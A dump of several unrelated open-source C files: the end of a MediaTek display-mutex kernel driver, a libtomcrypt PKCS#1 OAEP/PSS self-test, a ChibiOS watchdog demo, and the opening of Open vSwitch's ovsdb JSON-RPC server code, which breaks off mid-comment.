MT2712_MUTEX_MOD_DISP_RDMA2 15 #define MT2712_MUTEX_MOD_DISP_WDMA0 16 #define MT2712_MUTEX_MOD_DISP_WDMA1 17 #define MT2712_MUTEX_MOD_DISP_COLOR0 18 #define MT2712_MUTEX_MOD_DISP_COLOR1 19 #define MT2712_MUTEX_MOD_DISP_AAL0 20 #define MT2712_MUTEX_MOD_DISP_UFOE 22 #define MT2712_MUTEX_MOD_DISP_PWM0 23 #define MT2712_MUTEX_MOD_DISP_PWM1 24 #define MT2712_MUTEX_MOD_DISP_OD0 25 #define MT2712_MUTEX_MOD2_DISP_AAL1 33 #define MT2712_MUTEX_MOD2_DISP_OD1 34 #define MT2701_MUTEX_MOD_DISP_OVL 3 #define MT2701_MUTEX_MOD_DISP_WDMA 6 #define MT2701_MUTEX_MOD_DISP_COLOR 7 #define MT2701_MUTEX_MOD_DISP_BLS 9 #define MT2701_MUTEX_MOD_DISP_RDMA0 10 #define MT2701_MUTEX_MOD_DISP_RDMA1 12 #define MUTEX_SOF_SINGLE_MODE 0 #define MUTEX_SOF_DSI0 1 #define MUTEX_SOF_DSI1 2 #define MUTEX_SOF_DPI0 3 #define MUTEX_SOF_DPI1 4 #define MUTEX_SOF_DSI2 5 #define MUTEX_SOF_DSI3 6 struct mtk_disp_mutex { int id; bool claimed; }; enum mtk_ddp_mutex_sof_id { DDP_MUTEX_SOF_SINGLE_MODE, DDP_MUTEX_SOF_DSI0, DDP_MUTEX_SOF_DSI1, DDP_MUTEX_SOF_DPI0, DDP_MUTEX_SOF_DPI1, DDP_MUTEX_SOF_DSI2, DDP_MUTEX_SOF_DSI3, }; struct mtk_ddp_data { const unsigned int *mutex_mod; const unsigned int *mutex_sof; const unsigned int mutex_mod_reg; const unsigned int mutex_sof_reg; const bool no_clk; }; struct mtk_ddp { struct device *dev; struct clk *clk; void __iomem *regs; struct mtk_disp_mutex mutex[10]; const struct mtk_ddp_data *data; }; static const unsigned int mt2701_mutex_mod[DDP_COMPONENT_ID_MAX] = { [DDP_COMPONENT_BLS] = MT2701_MUTEX_MOD_DISP_BLS, [DDP_COMPONENT_COLOR0] = MT2701_MUTEX_MOD_DISP_COLOR, [DDP_COMPONENT_OVL0] = MT2701_MUTEX_MOD_DISP_OVL, [DDP_COMPONENT_RDMA0] = MT2701_MUTEX_MOD_DISP_RDMA0, [DDP_COMPONENT_RDMA1] = MT2701_MUTEX_MOD_DISP_RDMA1, [DDP_COMPONENT_WDMA0] = MT2701_MUTEX_MOD_DISP_WDMA, }; static const unsigned int mt2712_mutex_mod[DDP_COMPONENT_ID_MAX] = { [DDP_COMPONENT_AAL0] = MT2712_MUTEX_MOD_DISP_AAL0, [DDP_COMPONENT_AAL1] = MT2712_MUTEX_MOD2_DISP_AAL1, [DDP_COMPONENT_COLOR0] = MT2712_MUTEX_MOD_DISP_COLOR0, [DDP_COMPONENT_COLOR1] = MT2712_MUTEX_MOD_DISP_COLOR1, [DDP_COMPONENT_OD0] = MT2712_MUTEX_MOD_DISP_OD0, [DDP_COMPONENT_OD1] = MT2712_MUTEX_MOD2_DISP_OD1, [DDP_COMPONENT_OVL0] = MT2712_MUTEX_MOD_DISP_OVL0, [DDP_COMPONENT_OVL1] = MT2712_MUTEX_MOD_DISP_OVL1, [DDP_COMPONENT_PWM0] = MT2712_MUTEX_MOD_DISP_PWM0, [DDP_COMPONENT_PWM1] = MT2712_MUTEX_MOD_DISP_PWM1, [DDP_COMPONENT_PWM2] = MT2712_MUTEX_MOD_DISP_PWM2, [DDP_COMPONENT_RDMA0] = MT2712_MUTEX_MOD_DISP_RDMA0, [DDP_COMPONENT_RDMA1] = MT2712_MUTEX_MOD_DISP_RDMA1, [DDP_COMPONENT_RDMA2] = MT2712_MUTEX_MOD_DISP_RDMA2, [DDP_COMPONENT_UFOE] = MT2712_MUTEX_MOD_DISP_UFOE, [DDP_COMPONENT_WDMA0] = MT2712_MUTEX_MOD_DISP_WDMA0, [DDP_COMPONENT_WDMA1] = MT2712_MUTEX_MOD_DISP_WDMA1, }; static const unsigned int mt8173_mutex_mod[DDP_COMPONENT_ID_MAX] = { [DDP_COMPONENT_AAL0] = MT8173_MUTEX_MOD_DISP_AAL, [DDP_COMPONENT_COLOR0] = MT8173_MUTEX_MOD_DISP_COLOR0, [DDP_COMPONENT_COLOR1] = MT8173_MUTEX_MOD_DISP_COLOR1, [DDP_COMPONENT_GAMMA] = MT8173_MUTEX_MOD_DISP_GAMMA, [DDP_COMPONENT_OD0] = MT8173_MUTEX_MOD_DISP_OD, [DDP_COMPONENT_OVL0] = MT8173_MUTEX_MOD_DISP_OVL0, [DDP_COMPONENT_OVL1] = MT8173_MUTEX_MOD_DISP_OVL1, [DDP_COMPONENT_PWM0] = MT8173_MUTEX_MOD_DISP_PWM0, [DDP_COMPONENT_PWM1] = MT8173_MUTEX_MOD_DISP_PWM1, [DDP_COMPONENT_RDMA0] = MT8173_MUTEX_MOD_DISP_RDMA0, [DDP_COMPONENT_RDMA1] = MT8173_MUTEX_MOD_DISP_RDMA1, [DDP_COMPONENT_RDMA2] = MT8173_MUTEX_MOD_DISP_RDMA2, [DDP_COMPONENT_UFOE] = MT8173_MUTEX_MOD_DISP_UFOE, [DDP_COMPONENT_WDMA0] = MT8173_MUTEX_MOD_DISP_WDMA0, [DDP_COMPONENT_WDMA1] = MT8173_MUTEX_MOD_DISP_WDMA1, }; static const unsigned int mt2712_mutex_sof[DDP_MUTEX_SOF_DSI3 + 1] = { [DDP_MUTEX_SOF_SINGLE_MODE] = MUTEX_SOF_SINGLE_MODE, [DDP_MUTEX_SOF_DSI0] = MUTEX_SOF_DSI0, [DDP_MUTEX_SOF_DSI1] = MUTEX_SOF_DSI1, [DDP_MUTEX_SOF_DPI0] = MUTEX_SOF_DPI0, [DDP_MUTEX_SOF_DPI1] = MUTEX_SOF_DPI1, [DDP_MUTEX_SOF_DSI2] = MUTEX_SOF_DSI2, [DDP_MUTEX_SOF_DSI3] = MUTEX_SOF_DSI3, }; static const struct mtk_ddp_data mt2701_ddp_driver_data = { .mutex_mod = mt2701_mutex_mod, .mutex_sof = mt2712_mutex_sof, .mutex_mod_reg = MT2701_DISP_MUTEX0_MOD0, .mutex_sof_reg = MT2701_DISP_MUTEX0_SOF0, }; static const struct mtk_ddp_data mt2712_ddp_driver_data = { .mutex_mod = mt2712_mutex_mod, .mutex_sof = mt2712_mutex_sof, .mutex_mod_reg = MT2701_DISP_MUTEX0_MOD0, .mutex_sof_reg = MT2701_DISP_MUTEX0_SOF0, }; static const struct mtk_ddp_data mt8173_ddp_driver_data = { .mutex_mod = mt8173_mutex_mod, .mutex_sof = mt2712_mutex_sof, .mutex_mod_reg = MT2701_DISP_MUTEX0_MOD0, .mutex_sof_reg = MT2701_DISP_MUTEX0_SOF0, }; struct mtk_disp_mutex *mtk_disp_mutex_get(struct device *dev, unsigned int id) { struct mtk_ddp *ddp = dev_get_drvdata(dev); if (id >= 10) return ERR_PTR(-EINVAL); if (ddp->mutex[id].claimed) return ERR_PTR(-EBUSY); ddp->mutex[id].claimed = true; return &ddp->mutex[id]; } void mtk_disp_mutex_put(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); WARN_ON(&ddp->mutex[mutex->id] != mutex); mutex->claimed = false; } int mtk_disp_mutex_prepare(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); return clk_prepare_enable(ddp->clk); } void mtk_disp_mutex_unprepare(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); clk_disable_unprepare(ddp->clk); } void mtk_disp_mutex_add_comp(struct mtk_disp_mutex *mutex, enum mtk_ddp_comp_id id) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); unsigned int reg; unsigned int sof_id; unsigned int offset; WARN_ON(&ddp->mutex[mutex->id] != mutex); switch (id) { case DDP_COMPONENT_DSI0: sof_id = DDP_MUTEX_SOF_DSI0; break; case DDP_COMPONENT_DSI1: sof_id = DDP_MUTEX_SOF_DSI0; break; case DDP_COMPONENT_DSI2: sof_id = DDP_MUTEX_SOF_DSI2; break; case DDP_COMPONENT_DSI3: sof_id = DDP_MUTEX_SOF_DSI3; break; case DDP_COMPONENT_DPI0: sof_id = DDP_MUTEX_SOF_DPI0; break; case DDP_COMPONENT_DPI1: sof_id = DDP_MUTEX_SOF_DPI1; break; default: if (ddp->data->mutex_mod[id] < 32) { offset = DISP_REG_MUTEX_MOD(ddp->data->mutex_mod_reg, mutex->id); reg = readl_relaxed(ddp->regs + offset); reg |= 1 << ddp->data->mutex_mod[id]; writel_relaxed(reg, ddp->regs + offset); } else { offset = DISP_REG_MUTEX_MOD2(mutex->id); reg = readl_relaxed(ddp->regs + offset); reg |= 1 << (ddp->data->mutex_mod[id] - 32); writel_relaxed(reg, ddp->regs + offset); } return; } writel_relaxed(ddp->data->mutex_sof[sof_id], ddp->regs + DISP_REG_MUTEX_SOF(ddp->data->mutex_sof_reg, mutex->id)); } void mtk_disp_mutex_remove_comp(struct mtk_disp_mutex *mutex, enum mtk_ddp_comp_id id) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); unsigned int reg; unsigned int offset; WARN_ON(&ddp->mutex[mutex->id] != mutex); switch (id) { case DDP_COMPONENT_DSI0: case DDP_COMPONENT_DSI1: case DDP_COMPONENT_DSI2: case DDP_COMPONENT_DSI3: case DDP_COMPONENT_DPI0: case DDP_COMPONENT_DPI1: writel_relaxed(MUTEX_SOF_SINGLE_MODE, ddp->regs + DISP_REG_MUTEX_SOF(ddp->data->mutex_sof_reg, mutex->id)); break; default: if (ddp->data->mutex_mod[id] < 32) { offset = DISP_REG_MUTEX_MOD(ddp->data->mutex_mod_reg, mutex->id); reg = readl_relaxed(ddp->regs + offset); reg &= ~(1 << ddp->data->mutex_mod[id]); writel_relaxed(reg, ddp->regs + offset); } else { offset = DISP_REG_MUTEX_MOD2(mutex->id); reg = readl_relaxed(ddp->regs + offset); reg &= ~(1 << (ddp->data->mutex_mod[id] - 32)); writel_relaxed(reg, ddp->regs + offset); } break; } } void mtk_disp_mutex_enable(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); WARN_ON(&ddp->mutex[mutex->id] != mutex); writel(1, ddp->regs + DISP_REG_MUTEX_EN(mutex->id)); } void mtk_disp_mutex_disable(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); WARN_ON(&ddp->mutex[mutex->id] != mutex); writel(0, ddp->regs + DISP_REG_MUTEX_EN(mutex->id)); } void mtk_disp_mutex_acquire(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); u32 tmp; writel(1, ddp->regs + DISP_REG_MUTEX_EN(mutex->id)); writel(1, ddp->regs + DISP_REG_MUTEX(mutex->id)); if (readl_poll_timeout_atomic(ddp->regs + DISP_REG_MUTEX(mutex->id), tmp, tmp & INT_MUTEX, 1, 10000)) pr_err("could not acquire mutex %d\n", mutex->id); } void mtk_disp_mutex_release(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); writel(0, ddp->regs + DISP_REG_MUTEX(mutex->id)); } static int mtk_ddp_probe(struct platform_device *pdev) { struct device *dev = &pdev->dev; struct mtk_ddp *ddp; struct resource *regs; int i; ddp = devm_kzalloc(dev, sizeof(*ddp), GFP_KERNEL); if (!ddp) return -ENOMEM; for (i = 0; i < 10; i++) ddp->mutex[i].id = i; ddp->data = of_device_get_match_data(dev); if (!ddp->data->no_clk) { ddp->clk = devm_clk_get(dev, NULL); if (IS_ERR(ddp->clk)) { if (PTR_ERR(ddp->clk) != -EPROBE_DEFER) dev_err(dev, "Failed to get clock\n"); return PTR_ERR(ddp->clk); } } regs = platform_get_resource(pdev, IORESOURCE_MEM, 0); ddp->regs = devm_ioremap_resource(dev, regs); if (IS_ERR(ddp->regs)) { dev_err(dev, "Failed to map mutex registers\n"); return PTR_ERR(ddp->regs); } platform_set_drvdata(pdev, ddp); return 0; } static int mtk_ddp_remove(struct platform_device *pdev) { return 0; } static const struct of_device_id ddp_driver_dt_match[] = { { .compatible = "mediatek,mt2701-disp-mutex", .data = &mt2701_ddp_driver_data}, { .compatible = "mediatek,mt2712-disp-mutex", .data = &mt2712_ddp_driver_data}, { .compatible = "mediatek,mt8173-disp-mutex", .data = &mt8173_ddp_driver_data}, {}, }; MODULE_DEVICE_TABLE(of, ddp_driver_dt_match); struct platform_driver mtk_ddp_driver = { .probe = mtk_ddp_probe, .remove = mtk_ddp_remove, .driver = { .name = "mediatek-ddp", .owner = THIS_MODULE, .of_match_table = ddp_driver_dt_match, }, };
570791.c
#include <tomcrypt_test.h> #ifdef LTC_PKCS_1 int pkcs_1_test(void) { unsigned char buf[3][128]; int res1, res2, res3, prng_idx, hash_idx, err; unsigned long x, y, l1, l2, l3, i1, i2, lparamlen, saltlen, modlen; static const unsigned char lparam[] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; /* get hash/prng */ hash_idx = find_hash("sha1"); prng_idx = find_prng("yarrow"); if (hash_idx == -1 || prng_idx == -1) { fprintf(stderr, "pkcs_1 tests require sha1/yarrow"); return 1; } srand(time(NULL)); /* do many tests */ for (x = 0; x < 100; x++) { zeromem(buf, sizeof(buf)); /* make a dummy message (of random length) */ l3 = (rand() & 31) + 8; for (y = 0; y < l3; y++) buf[0][y] = rand() & 255; /* pick a random lparam len [0..16] */ lparamlen = abs(rand()) % 17; /* pick a random saltlen 0..16 */ saltlen = abs(rand()) % 17; /* LTC_PKCS #1 v2.0 supports modlens not multiple of 8 */ modlen = 800 + (abs(rand()) % 224); /* encode it */ l1 = sizeof(buf[1]); DO(pkcs_1_oaep_encode(buf[0], l3, lparam, lparamlen, modlen, &yarrow_prng, prng_idx, hash_idx, buf[1], &l1)); /* decode it */ l2 = sizeof(buf[2]); DO(pkcs_1_oaep_decode(buf[1], l1, lparam, lparamlen, modlen, hash_idx, buf[2], &l2, &res1)); if (res1 != 1 || l2 != l3 || memcmp(buf[2], buf[0], l3) != 0) { fprintf(stderr, "Outsize == %lu, should have been %lu, res1 = %d, lparamlen = %lu, msg contents follow.\n", l2, l3, res1, lparamlen); fprintf(stderr, "ORIGINAL:\n"); for (x = 0; x < l3; x++) { fprintf(stderr, "%02x ", buf[0][x]); } fprintf(stderr, "\nRESULT:\n"); for (x = 0; x < l2; x++) { fprintf(stderr, "%02x ", buf[2][x]); } fprintf(stderr, "\n\n"); return 1; } /* test PSS */ l1 = sizeof(buf[1]); DO(pkcs_1_pss_encode(buf[0], l3, saltlen, &yarrow_prng, prng_idx, hash_idx, modlen, buf[1], &l1)); DO(pkcs_1_pss_decode(buf[0], l3, buf[1], l1, saltlen, hash_idx, modlen, &res1)); buf[0][i1 = abs(rand()) % l3] ^= 1; DO(pkcs_1_pss_decode(buf[0], l3, buf[1], l1, saltlen, hash_idx, modlen, &res2)); buf[0][i1] ^= 1; buf[1][i2 = abs(rand()) % (l1 - 1)] ^= 1; pkcs_1_pss_decode(buf[0], l3, buf[1], l1, saltlen, hash_idx, modlen, &res3); if (!(res1 == 1 && res2 == 0 && res3 == 0)) { fprintf(stderr, "PSS failed: %d, %d, %d, %lu, %lu\n", res1, res2, res3, l3, saltlen); return 1; } } return 0; } #else int pkcs_1_test(void) { fprintf(stderr, "NOP"); return 0; } #endif /* $Source: /cvs/libtom/libtomcrypt/testprof/pkcs_1_test.c,v $ */ /* $Revision: 1.8 $ */ /* $Date: 2007/05/12 14:32:35 $ */
913796.c
/* ChibiOS - Copyright (C) 2016..2018 Theodore Ateba Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #include "ch.h" #include "hal.h" #include "chprintf.h" BaseSequentialStream *chp = (BaseSequentialStream *) &SD1; /* * Watchdog dealine set to one second. */ static const WDGConfig wdgcfg = { false, /* WDT use period mode, set true for window mode. */ WDT_PER_1KCLK_gc, /* Normal timeout period of 1 second. */ WDT_WPER_1KCLK_gc /* Closed timeout period of 1 second. */ }; /* * Application entry point. */ int main(void) { /* * System initializations. * - HAL initialization, this also initializes the configured device drivers * and performs the board-specific initializations. * - Kernel initialization, the main() function becomes a thread and the * RTOS is active. */ halInit(); chSysInit(); /* * Configure TX (PINC3) and RX (PIN2) for the USART1. */ palSetPadMode(IOPORT3, PIN3, PAL_MODE_OUTPUT_PUSHPULL); palSetPadMode(IOPORT3, PIN2, PAL_MODE_INPUT_PULLUP); /* * Start the Serial driver 1. */ sdStart(&SD1, NULL); /* * Starting the watchdog driver. */ wdgStart(&WDTD1, &wdgcfg); chprintf(chp, "Watchdog driver test program.\r\n"); /* * Normal main() thread activity, it resets the watchdog. */ while (TRUE) { chprintf(chp, "Watchdog reset by software.\r\n"); wdgReset(&WDTD1); // TODO: Rebuild whit this line commented. // It will shows you if the board is rebooted // by the watchdog. palTogglePad(IOPORT5, PORTE_LED); chThdSleepMilliseconds(500); // Use for example 2 second of delay to see if the watchdog reset the board every second. } return 0; }
128079.c
/* Copyright (c) 2009, 2010 Nicira Networks * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <config.h> #include "jsonrpc-server.h" #include <assert.h> #include <errno.h> #include "bitmap.h" #include "column.h" #include "json.h" #include "jsonrpc.h" #include "ovsdb-error.h" #include "ovsdb-parser.h" #include "ovsdb.h" #include "reconnect.h" #include "row.h" #include "stream.h" #include "table.h" #include "timeval.h" #include "transaction.h" #include "trigger.h" #include "vlog.h" VLOG_DEFINE_THIS_MODULE(ovsdb_jsonrpc_server); struct ovsdb_jsonrpc_remote; struct ovsdb_jsonrpc_session; /* Message rate-limiting. */ struct vlog_rate_limit rl = VLOG_RATE_LIMIT_INIT(1, 5); /* Sessions. */ static struct ovsdb_jsonrpc_session *ovsdb_jsonrpc_session_create( struct ovsdb_jsonrpc_remote *, struct jsonrpc_session *); static void ovsdb_jsonrpc_session_run_all(struct ovsdb_jsonrpc_remote *); static void ovsdb_jsonrpc_session_wait_all(struct ovsdb_jsonrpc_remote *); static void ovsdb_jsonrpc_session_close_all(struct ovsdb_jsonrpc_remote *); static void ovsdb_jsonrpc_session_reconnect_all(struct ovsdb_jsonrpc_remote *); static void ovsdb_jsonrpc_session_set_all_options( struct ovsdb_jsonrpc_remote *, const struct ovsdb_jsonrpc_options *); static void ovsdb_jsonrpc_session_get_status( const struct ovsdb_jsonrpc_remote *, struct shash *); /* Triggers. */ static void ovsdb_jsonrpc_trigger_create(struct ovsdb_jsonrpc_session *, struct json *id, struct json *params); static struct ovsdb_jsonrpc_trigger *ovsdb_jsonrpc_trigger_find( struct ovsdb_jsonrpc_session *, const struct json *id, size_t hash); static void ovsdb_jsonrpc_trigger_complete(struct ovsdb_jsonrpc_trigger *); static void ovsdb_jsonrpc_trigger_complete_all(struct ovsdb_jsonrpc_session *); static void ovsdb_jsonrpc_trigger_complete_done( struct ovsdb_jsonrpc_session *); /* Monitors. */ static struct json *ovsdb_jsonrpc_monitor_create( struct ovsdb_jsonrpc_session *, struct json *params); static struct jsonrpc_msg *ovsdb_jsonrpc_monitor_cancel( struct ovsdb_jsonrpc_session *, struct json_array *params, const struct json *request_id); static void ovsdb_jsonrpc_monitor_remove_all(struct ovsdb_jsonrpc_session *); /* JSON-RPC database server. */ struct ovsdb_jsonrpc_server { struct ovsdb *db; unsigned int n_sessions, max_sessions; struct shash remotes; /* Contains "struct ovsdb_jsonrpc_remote *"s. */ }; /* A configured remote. This is either a passive stream listener plus a list * of the currently connected sessions, or a list of exactly one active * session. */ struct ovsdb_jsonrpc_remote { struct ovsdb_jsonrpc_server *server; struct pstream *listener; /* Listener, if passive. */ struct list sessions; /* List of "struct ovsdb_jsonrpc_session"s. */ }; static struct ovsdb_jsonrpc_remote *ovsdb_jsonrpc_server_add_remote( struct ovsdb_jsonrpc_server *, const char *name); static void ovsdb_jsonrpc_server_del_remote(struct shash_node *); struct ovsdb_jsonrpc_server * ovsdb_jsonrpc_server_create(struct ovsdb *db) { struct ovsdb_jsonrpc_server *server = xzalloc(sizeof *server); server->db = db; server->max_sessions = 64; shash_init(&server->remotes); return server; } void ovsdb_jsonrpc_server_destroy(struct ovsdb_jsonrpc_server *svr) { struct shash_node *node, *next; SHASH_FOR_EACH_SAFE (node, next, &svr->remotes) { ovsdb_jsonrpc_server_del_remote(node); } shash_destroy(&svr->remotes); free(svr); } struct ovsdb_jsonrpc_options * ovsdb_jsonrpc_default_options(void) { struct ovsdb_jsonrpc_options *options = xzalloc(sizeof *options); options->probe_interval = RECONNECT_DEFAULT_PROBE_INTERVAL; options->max_backoff = RECONNECT_DEFAULT_MAX_BACKOFF; return options; } /* Sets 'svr''s current set of remotes to the names in 'new_remotes', with * options in the struct ovsdb_jsonrpc_options supplied as the data values. * * A remote is an active or passive stream connection method, e.g. "pssl:" or * "tcp:1.2.3.4". */ void ovsdb_jsonrpc_server_set_remotes(struct ovsdb_jsonrpc_server *svr, const struct shash *new_remotes) { struct shash_node *node, *next; SHASH_FOR_EACH_SAFE (node, next, &svr->remotes) { if (!shash_find(new_remotes, node->name)) { ovsdb_jsonrpc_server_del_remote(node); } } SHASH_FOR_EACH (node, new_remotes) { const struct ovsdb_jsonrpc_options *options = node->data; struct ovsdb_jsonrpc_remote *remote; remote = shash_find_data(&svr->remotes, node->name); if (!remote) { remote = ovsdb_jsonrpc_server_add_remote(svr, node->name); if (!remote) { continue; } } ovsdb_jsonrpc_session_set_all_options(remote, options); } } static struct ovsdb_jsonrpc_remote * ovsdb_jsonrpc_server_add_remote(struct ovsdb_jsonrpc_server *svr, const char *name) { struct ovsdb_jsonrpc_remote *remote; struct pstream *listener; int error; error = jsonrpc_pstream_open(name, &listener); if (error && error != EAFNOSUPPORT) { VLOG_ERR_RL(&rl, "%s: listen failed: %s", name, strerror(error)); return NULL; } remote = xmalloc(sizeof *remote); remote->server = svr; remote->listener = listener; list_init(&remote->sessions); shash_add(&svr->remotes, name, remote); if (!listener) { ovsdb_jsonrpc_session_create(remote, jsonrpc_session_open(name)); } return remote; } static void ovsdb_jsonrpc_server_del_remote(struct shash_node *node) { struct ovsdb_jsonrpc_remote *remote = node->data; ovsdb_jsonrpc_session_close_all(remote); pstream_close(remote->listener); shash_delete(&remote->server->remotes, node); free(remote); } void ovsdb_jsonrpc_server_get_remote_status(const struct ovsdb_jsonrpc_server *svr, struct shash *statuses) { struct shash_node *node; shash_init(statuses); SHASH_FOR_EACH (node, &svr->remotes) { const struct ovsdb_jsonrpc_remote *remote = node->data; ovsdb_jsonrpc_session_get_status(remote, statuses); } } /* Forces all of the JSON-RPC sessions managed by 'svr' to disconnect and * reconnect. */ void ovsdb_jsonrpc_server_reconnect(struct ovsdb_jsonrpc_server *svr) { struct shash_node *node; SHASH_FOR_EACH (node, &svr->remotes) { struct ovsdb_jsonrpc_remote *remote = node->data; ovsdb_jsonrpc_session_reconnect_all(remote); } } void ovsdb_jsonrpc_server_run(struct ovsdb_jsonrpc_server *svr) { struct shash_node *node; SHASH_FOR_EACH (node, &svr->remotes) { struct ovsdb_jsonrpc_remote *remote = node->data; if (remote->listener && svr->n_sessions < svr->max_sessions) { struct stream *stream; int error; error = pstream_accept(remote->listener, &stream); if (!error) { struct jsonrpc_session *js; js = jsonrpc_session_open_unreliably(jsonrpc_open(stream)); ovsdb_jsonrpc_session_create(remote, js); } else if (error != EAGAIN) { VLOG_WARN_RL(&rl, "%s: accept failed: %s", pstream_get_name(remote->listener), strerror(error)); } } ovsdb_jsonrpc_session_run_all(remote); } } void ovsdb_jsonrpc_server_wait(struct ovsdb_jsonrpc_server *svr) { struct shash_node *node; SHASH_FOR_EACH (node, &svr->remotes) { struct ovsdb_jsonrpc_remote *remote = node->data; if (remote->listener && svr->n_sessions < svr->max_sessions) { pstream_wait(remote->listener); } ovsdb_jsonrpc_session_wait_all(remote); } } /* JSON-RPC database server session. */ struct ovsdb_jsonrpc_session { struct ovsdb_jsonrpc_remote *remote; struct list node; /* Element in remote's sessions list. */ /* Triggers. */ struct hmap triggers; /* Hmap of "struct ovsdb_jsonrpc_trigger"s. */ struct list completions; /* Completed triggers. */ /* Monitors. */ struct hmap monitors; /* Hmap of "struct ovsdb_jsonrpc_monitor"s. */ /* Network connectivity. */ struct jsonrpc_session *js; /* JSON-RPC session. */ unsigned int js_seqno; /* Last jsonrpc_session_get_seqno() value. */ }; static void ovsdb_jsonrpc_session_close(struct ovsdb_jsonrpc_session *); static int ovsdb_jsonrpc_session_run(struct ovsdb_jsonrpc_session *); static void ovsdb_jsonrpc_session_wait(struct ovsdb_jsonrpc_session *); static void ovsdb_jsonrpc_session_set_options( struct ovsdb_jsonrpc_session *, const struct ovsdb_jsonrpc_options *); static void ovsdb_jsonrpc_session_got_request(struct ovsdb_jsonrpc_session *, struct jsonrpc_msg *); static void ovsdb_jsonrpc_session_got_notify(struct ovsdb_jsonrpc_session *, struct jsonrpc_msg *); static struct ovsdb_jsonrpc_session * ovsdb_jsonrpc_session_create(struct ovsdb_jsonrpc_remote *remote, struct jsonrpc_session *js) { struct ovsdb_jsonrpc_session *s; s = xzalloc(sizeof *s); s->remote = remote; list_push_back(&remote->sessions, &s->node); hmap_init(&s->triggers); hmap_init(&s->monitors); list_init(&s->completions); s->js = js; s->js_seqno = jsonrpc_session_get_seqno(js); remote->server->n_sessions++; return s; } static void ovsdb_jsonrpc_session_close(struct ovsdb_jsonrpc_session *s) { ovsdb_jsonrpc_monitor_remove_all(s); jsonrpc_session_close(s->js); list_remove(&s->node); s->remote->server->n_sessions--; free(s); } static int ovsdb_jsonrpc_session_run(struct ovsdb_jsonrpc_session *s) { jsonrpc_session_run(s->js); if (s->js_seqno != jsonrpc_session_get_seqno(s->js)) { s->js_seqno = jsonrpc_session_get_seqno(s->js); ovsdb_jsonrpc_trigger_complete_all(s); ovsdb_jsonrpc_monitor_remove_all(s); } ovsdb_jsonrpc_trigger_complete_done(s); if (!jsonrpc_session_get_backlog(s->js)) { struct jsonrpc_msg *msg = jsonrpc_session_recv(s->js); if (msg) { if (msg->type == JSONRPC_REQUEST) { ovsdb_jsonrpc_session_got_request(s, msg); } else if (msg->type == JSONRPC_NOTIFY) { ovsdb_jsonrpc_session_got_notify(s, msg); } else { VLOG_WARN("%s: received unexpected %s message", jsonrpc_session_get_name(s->js), jsonrpc_msg_type_to_string(msg->type)); jsonrpc_session_force_reconnect(s->js); jsonrpc_msg_destroy(msg); } } } return jsonrpc_session_is_alive(s->js) ? 0 : ETIMEDOUT; } static void ovsdb_jsonrpc_session_set_options(struct ovsdb_jsonrpc_session *session, const struct ovsdb_jsonrpc_options *options) { jsonrpc_session_set_max_backoff(session->js, options->max_backoff); jsonrpc_session_set_probe_interval(session->js, options->probe_interval); } static void ovsdb_jsonrpc_session_run_all(struct ovsdb_jsonrpc_remote *remote) { struct ovsdb_jsonrpc_session *s, *next; LIST_FOR_EACH_SAFE (s, next, node, &remote->sessions) { int error = ovsdb_jsonrpc_session_run(s); if (error) { ovsdb_jsonrpc_session_close(s); } } } static void ovsdb_jsonrpc_session_wait(struct ovsdb_jsonrpc_session *s) { jsonrpc_session_wait(s->js); if (!jsonrpc_session_get_backlog(s->js)) { jsonrpc_session_recv_wait(s->js); } } static void ovsdb_jsonrpc_session_wait_all(struct ovsdb_jsonrpc_remote *remote) { struct ovsdb_jsonrpc_session *s; LIST_FOR_EACH (s, node, &remote->sessions) { ovsdb_jsonrpc_session_wait(s); } } static void ovsdb_jsonrpc_session_close_all(struct ovsdb_jsonrpc_remote *remote) { struct ovsdb_jsonrpc_session *s, *next; LIST_FOR_EACH_SAFE (s, next, node, &remote->sessions) { ovsdb_jsonrpc_session_close(s); } } /* Forces all of the JSON-RPC sessions managed by 'remote' to disconnect and * reconnect. */ static void ovsdb_jsonrpc_session_reconnect_all(struct ovsdb_jsonrpc_remote *remote) { struct ovsdb_jsonrpc_session *s, *next; LIST_FOR_EACH_SAFE (s, next, node, &remote->sessions) { jsonrpc_session_force_reconnect(s->js); if (!jsonrpc_session_is_alive(s->js)) { ovsdb_jsonrpc_session_close(s); } } } /* Sets the options for all of the JSON-RPC sessions managed by 'remote' to * 'options'. */ static void ovsdb_jsonrpc_session_set_all_options( struct ovsdb_jsonrpc_remote *remote, const struct ovsdb_jsonrpc_options *options) { struct ovsdb_jsonrpc_session *s; LIST_FOR_EACH (s, node, &remote->sessions) { ovsdb_jsonrpc_session_set_options(s, options); } } static void ovsdb_jsonrpc_session_get_status(const struct ovsdb_jsonrpc_remote *remote, struct shash *shash) { const struct ovsdb_jsonrpc_session *s; const struct jsonrpc_session *js; const char *name; struct ovsdb_jsonrpc_remote_status *status; struct reconnect_stats rstats; /* We only look at the first session in the list. There should be only one * node in the list for outbound connections. We don't track status for * each individual inbound connection if someone configures the DB that * way. Since outbound connections are the 